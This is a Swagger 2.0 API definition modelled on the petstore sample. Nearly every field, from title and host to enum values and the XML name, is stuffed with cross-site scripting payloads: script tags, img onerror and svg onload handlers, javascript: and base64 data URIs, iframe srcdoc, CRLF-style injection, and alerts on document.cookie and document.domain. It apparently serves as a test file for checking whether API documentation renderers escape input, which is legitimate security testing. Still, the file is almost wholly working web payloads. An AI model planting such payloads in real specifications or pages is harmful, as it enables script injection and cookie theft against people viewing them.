swagger: "2.0"
info:
  description: "xss: <img src=x onerror=\"javascript:alert(1)\"> <iframe src=\"javascript:alert('iframe XSS')\"></iframe>"
  title: "<img src=1 onerror='javascript:alert(document.domain)'><iframe src=javascript:alert(1)></iframe>"
  version: "1.0><script>alert(1)</script><iframe src=javascript:alert('version')></iframe>"
  x-xss-protection: "0"
  termsOfService: "javascript:alert(1)//><iframe src=javascript:alert('ToS')></iframe>"
  contact:
    email: "test@example.com\"><marquee>demo</marquee><iframe src=javascript:alert('email')></iframe>"
    name: "Support%0a%0d\"><script>alert(1)</script><iframe src=javascript:alert('name')></iframe>"
    url: "https://example.com%0a%0d\"><h1>demo</h1><iframe src=javascript:alert('url')></iframe>"
externalDocs:
  description: "<svg/onload=alert(document.cookie)><iframe onload=alert('iframe loaded')></iframe>"
  url: "javascript:alert(document.domain)%0a%0d\"><script>alert(1)</script><iframe src=javascript:alert('external')></iframe>"
host: "example.com\"><img src=x onerror=alert(1)><iframe srcdoc=\"<script>alert('host iframe')</script>\"></iframe>"
basePath: "/v2\"></script><script>alert(1)</script><iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgnaWZyYW1lJyk8L3NjcmlwdD4=></iframe>"
schemes:
- "https"
- "http%0a%0d\"><h1>demo</h1><iframe src=javascript:alert(2)></iframe>"
paths:
  /pet:
    post:
      tags:
      - "pet\"onmouseover=\"alert(1)"
      - "tag\"><marquee>demo</marquee>"
      - "tag%0a%0d\"><script>alert(1)</script>"
      - "tag\"><iframe src=javascript:alert('tag iframe')></iframe>"
      summary: "<img src=x onerror=alert(document.domain)><iframe src=javascript:alert('summary')></iframe>"
      description: "Add a new pet to the store%0a%0d\"><h1>demo</h1><iframe src=\"data:text/html,<script>alert('description iframe')</script>\"></iframe>"
      operationId: "addPet\"><marquee>demo</marquee><script>alert(1)</script><iframe srcdoc=\"<img src=x onerror=alert('srcdoc iframe')>\"></iframe>"
      consumes:
      - "application/xml"
      - "application/json%0a%0d\"><script>alert(1)</script>"
      - "text/html\"><iframe src=javascript:alert('consumes')></iframe>"
      produces:
      - "application/xml"
      - "text/html%0a%0d\"><h1>demo</h1>"
      - "image/png\"><iframe src=javascript:alert('produces')></iframe>"
      parameters:
      - in: "body"
        name: "body\"><img src=1 onerror='alert(1)'><iframe src=javascript:alert('param name')></iframe>"
        description: "Pet object that needs to be added to the store\"><marquee>demo</marquee>%0a%0d\"><script>alert(1)</script><iframe src=javascript:alert('param description')></iframe>"
        required: true
        schema:
          $ref: "#/definitions/Pet"
      responses:
        "405":
          description: "Invalid input<script>alert(1)</script>%0a%0d\"><h1>demo</h1><iframe src=javascript:alert('response')></iframe>"
        "200":
          description: "Success\"><marquee>demo</marquee><iframe srcdoc=\"<script>alert('success')</script>\"></iframe>"
definitions:
  Pet:
    type: "object"
    required:
    - "name%0a%0d\"><script>alert(1)</script><iframe src=javascript:alert('required')></iframe>"
    properties:
      id:
        type: "integer"
        format: "int64%0a%0d\"><h1>demo</h1><iframe src=javascript:alert('format')></iframe>"
      name:
        type: "string"
        example: "\"><marquee>demo</marquee>%0a%0d\"><script>alert(1)</script><iframe src=javascript:alert('example')></iframe>"
        example: "\"><marquee>demo</marquee><img src=x onerror=alert(1)>"
      status:
        type: "string"
        description: "pet status in the store<img src=x onerror=alert(document.cookie)><iframe src=javascript:alert('status')></iframe>"
        enum:
        - "available\"><marquee>demo</marquee><iframe src=javascript:alert('enum1')></iframe>"
        - "pending%0a%0d\"><h1>demo</h1><iframe src=javascript:alert('enum2')></iframe>"
        - "sold%0a%0d\"><script>alert(1)</script><iframe srcdoc=\"<script>alert('enum3')</script>\"></iframe>"
    xml:
      name: "Pet\"><marquee>demo</marquee><script>setTimeout(function(){alert('Delayed XSS')},1500)</script>%0a%0d\"><h1>demo</h1><iframe src=javascript:alert('xml name')></iframe>"
